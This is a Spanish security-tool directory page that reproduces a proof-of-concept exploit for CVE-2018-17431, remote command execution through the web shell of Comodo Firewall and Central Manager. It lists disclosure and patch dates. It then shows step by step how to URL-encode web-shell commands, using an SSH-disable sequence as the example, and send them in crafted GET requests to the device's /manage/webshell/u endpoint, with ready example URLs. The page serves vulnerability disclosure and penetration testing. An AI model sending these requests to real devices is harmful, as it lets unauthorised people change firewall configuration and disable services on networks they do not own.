Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-17431-PoC — Prueba de consepto para CVE-2018-17431 | Kitploit
Herramientas/GitHubGitHub/fadavvi/cve-2018-17431-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoArchived
GitHubfadavvi/cve-2018-17431-poc

CVE-2018-17431-PoC

Prueba de consepto para CVE-2018-17431

Ver Repositorio
23hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-17431-PoC

Prueba de concepto para CVE-2018-17431

Título del Exploit: Comodo Firewall & Central Manager (UTM) Todas las versiones anteriores a 2.7.0 y 1.5.0 Ejecución remota de comandos (basado en Web Shell)

Autor del Exploit: Milad Fadavvi

Página del vendedor: https://www.comodo.com/

Enlace del software: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Versión: anteriores a 2.7.0 y 1.5.0

Probado en: Windows:firefox/chrome - Kali:firefox

Fecha de descubrimiento: 2018-08-15 (reportado el mismo día)

Confirmación de que el error existe: 2018-09-22 (Ticket ID: XWR-503-79437)

Parche lanzado: 2018-11-23 Notas de la versión de Comodo

Exploit:

  1. Simulación de WebShell:

    root@kitploit:~
     Por ejemplo, deshabilitar SSH en el web shell es así:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Codificación

    root@kitploit:~
     codifique la secuencia anterior con codificación URL
     (usé el complemento de codificador de Burp)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Ejecución

    root@kitploit:~
     URL base: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Comando_Codificado]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (tecla enter extra para ejecutar el comando)
               
    
     Ejemplo: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

Aparecerá una página con el mensaje "Configuration has been altered" y la configuración cambiará.

Con esta técnica, podemos simular todos los comandos del WebShell.

Descargar herramienta